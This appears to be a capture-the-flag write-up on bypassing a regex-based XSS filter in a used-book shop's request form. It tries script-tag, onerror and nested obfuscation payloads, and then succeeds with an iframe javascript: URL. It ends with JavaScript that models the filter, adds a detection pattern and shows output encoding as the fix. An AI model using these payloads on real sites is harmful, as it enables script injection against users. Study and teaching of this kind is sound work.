Canal Cove Books

The owner watched a tutorial on XSS and wrote two regexes. Two.

Room Description

Canal Cove Books — figure 1

https://dashboard.webverselabs-pro.com/challenges/canal-cove-books

Scenario

Canal Cove Books is a neighborhood used-book shop with a search over 40,000 titles. The owner added "security" — strip <script>, strip on*= handlers. He reads Hacker News now. The one thing he didn't account for is that not every way to run JavaScript looks like a script tag or an event handler.

Objective

The owner watched a tutorial on XSS and wrote two regexes. Two.

Initial Analysis

Hey-ho! From the description of this challenge I have a feeling I know how this is going to go, especially after solving Banyan with different methods.

We have a web application that sells second-hand books.

Canal Cove Books — figure 2

From the nav-bar we have the following endpoints:

  <nav class="cc-footer-nav">
    <a href="/">Front page</a>
    <a href="/find-request">Find-request board</a>
    <a href="/staff-picks">Staff picks</a>
    <a href="/hours">Visit</a>
  </nav>

Nothing really stands out on the front page. There is a staff-picks section at the bottom, which I am sure mirrors the /staff-picks endpoint.

Finding the bug

/staff-picks

This is just a static page with a grid of books chosen by the staff.

Canal Cove Books — figure 3

/hours (Visit)

This is just another static page with the shop's opening hours.

Canal Cove Books — figure 4

/find-request

Now this looks interesting!

Canal Cove Books — figure 5

A page where we can request a book and they will notify us.

      <form class="cc-request-form" method="post" action="/find-request">
        <label class="cc-field">
          <span class="cc-field-label">Title / author</span>
          <input name="title" placeholder='e.g. "Ada or Ardor" — Nabokov, hardcover' autocomplete="off" required>
        </label>
        <label class="cc-field">
          <span class="cc-field-label">Your email (optional)</span>
          <input type="email" name="email" placeholder="[email protected]">
        </label>
        <label class="cc-field">
          <span class="cc-field-label">Notes (condition, edition, dust-jacket preferences)</span>
          <textarea name="notes" rows="3" placeholder="Any first-edition is fine. Prefer a decent dust-jacket."></textarea>
        </label>
        <button type="submit" class="cc-btn">Post to the board</button>
      </form>

The form is as above. Let's submit anything and see where our input gets reflected; I assume the recent postings section.

Canal Cove Books — figure 6

Yes, that's exactly where.

Canal Cove Books — figure 7

We sent the following payload:

title=test&email=minatour%40gmail.com&notes=test

The only place in the frontend where our input gets reflected is here:

Canal Cove Books — figure 8

Exploitation

We can try basic payloads like:

<script>alert(0)</script>
<img src=x onerror=alert(0)>

but the description explicitly says those are stripped. For fun, we can try a semi-obfuscated <script> payload that only works if the filter makes a single pass and leaves the pieces to re-form around the hole:

<scr<script>ipt>alert(0)</script>

Unfortunately, it didn't get through.

Canal Cove Books — figure 9

I also decided to try to be a little funkier.

<<script>scr<script>ipt<script>>alert(0)<</script>/scr</script>ipt</script>>

and managed to get the following output:

<p class="cc-req-title"></scr</script>ipt</script>></p>

and unfortunately, it doesn't work either. There are many obfuscation methods that are worth trying to sharpen your XSS methodology, but this challenge doesn't require them; it just requires knowing different types of payloads, such as the following: consuming tags

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#consuming-tags

Canal Cove Books — figure 10

but that still has an event handler inside. Luckily, iframes accept a different kind of payload if the tag itself gets through: a javascript: URL in the src attribute. That is neither a <script> tag nor an on* attribute, so neither regex touches it:

<iframe src="javascript:alert(1)"></iframe>

This is based on:

https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

IFRAME

If iFrames are allowed there are a lot of other XSS problems as well:
Canal Cove Books — figure 11
Canal Cove Books — figure 12
Canal Cove Books — figure 13
Canal Cove Books — figure 14

And there we go ^^, flag received.
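To see exactly why the iframe payload survives where the others don't, here is an added example of my own (not the challenge's code; the real filter is never shown). It models the two regexes as I assume they are written. The assumed patterns are a guess, but they reproduce the exact output the board gave for the deeply nested payload above, which suggests the guess is close. The same block shows the fix: HTML-encode on output instead of trying to recognise bad markup. The helper names are mine.

```javascript
// Added example, not the challenge's real filter.
// ASSUMPTION: the shop's "two regexes" are approximated by these patterns.
// Pattern 1 drops <script ...>...</script> blocks, lazily, up to the first close tag.
// Pattern 2 drops on*= attributes with quoted or bare values.
const SCRIPT_BLOCK = /<script\b[^>]*>[\s\S]*?<\/script>/gi;
const ON_HANDLER = /\son\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi;

// The owner's approach: delete the things he has heard of.
function naiveSanitize(input) {
  return input.replace(SCRIPT_BLOCK, '').replace(ON_HANDLER, '');
}

// The fix: do not try to recognise "bad" HTML at all. Encode the text for the
// context it is rendered in (HTML text / attribute content), so the browser
// never parses user input as markup.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Narrow check for the third way to run script that the two patterns never
// model: a javascript: URL in a URL attribute. Constructed for this page,
// not a general XSS detector.
function stillHasJsUrl(html) {
  return /\b(?:src|href|action)\s*=\s*["']?\s*javascript:/i.test(html);
}

// Constructed payloads: the ones tried on the board, in the order tried.
const PAYLOADS = {
  script: '<script>alert(0)</script>',
  imgOnerror: '<img src=x onerror=alert(0)>',
  nested: '<scr<script>ipt>alert(0)</script>',
  nestedDeep: '<<script>scr<script>ipt<script>>alert(0)<</script>/scr</script>ipt</script>>',
  iframeJsUrl: '<iframe src="javascript:alert(1)"></iframe>',
};

// Returns, per payload, what the naive filter leaves, whether a javascript:
// URL survived it, and what the encoded (safe) rendering looks like.
function runAll() {
  const out = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    const naive = naiveSanitize(p);
    out[name] = { naive, survivesNaive: stillHasJsUrl(naive), escaped: escapeHtml(p) };
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, r] of Object.entries(runAll())) {
    console.log(name.padEnd(12), JSON.stringify(r.naive), r.survivesNaive ? '  <- javascript: URL survives' : '');
  }
}
```

Run it with node. The nestedDeep case comes out as `</scr</script>ipt</script>>`, the same string the board rendered, because the lazy pattern eats everything from the first `<script>` to the first `</script>`, including the alert. The iframe payload comes back untouched: the bypass is not cleverness against the regex, it is a third execution primitive (the javascript: URL scheme) that the two patterns never model. Encoding on output removes the whole class rather than chasing primitives one at a time.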